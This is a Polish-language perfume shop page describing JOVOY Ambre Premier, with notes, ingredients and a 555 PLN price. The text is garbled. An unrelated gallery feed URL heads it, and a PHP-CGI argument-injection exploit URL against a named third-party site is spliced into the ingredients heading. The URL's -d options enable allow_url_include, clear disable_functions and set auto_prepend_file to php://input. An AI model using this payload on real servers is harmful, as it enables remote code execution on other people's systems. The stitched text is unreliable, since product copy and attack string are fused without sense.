http://crug-glas.co.uk/gallery/job_0142_8bit/feed/

JOVOY Ambre Premier

JOVOY Ambre Premier
Woda Perfumowana

Cóż innego niż ambra mogłoby stać się główną nutą zapachu o tak sugestywnej nazwie? Sam Francois Henin mówi o nim: “Kochamy jego niemal dziecinne pierwsze nuty, które przywołują na myśl watę cukrową. Zapach fuzji, pozostawiający na skórze zmysłowy ślad; ot takie słodkie nic by uczynić to wszystko lepszym”. Całą tę słodycz perfumy zawdzięczają paczuli i odrobinie czekolady, które lśnią i mienią się niczym maleńkie kryształki. Aby stonować odrobinkę tego łasucha do kompozycji wprowadzona została nuta świeżej róży, która jest idealnym kontrastem i balansem tej odurzającej delicji.
JOVOY odkrywa przed nami niezliczone oblicza ambry, których dotychczas nie mieliśmy okazji poznać, a przy tym przedstawia zapach dojrzały, elegancki i pełen gracji.

http://stuarturbandesign.com/cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n Skład JOVOY Ambre Premier:
kandyzowana pomarańcza, róża, paczula, ambra, wanilia


  • JOVOY Ambre Premier 100 ml - 555 PLN
Loading Aktualizowanie koszyka...    LoadingAktualizowanie...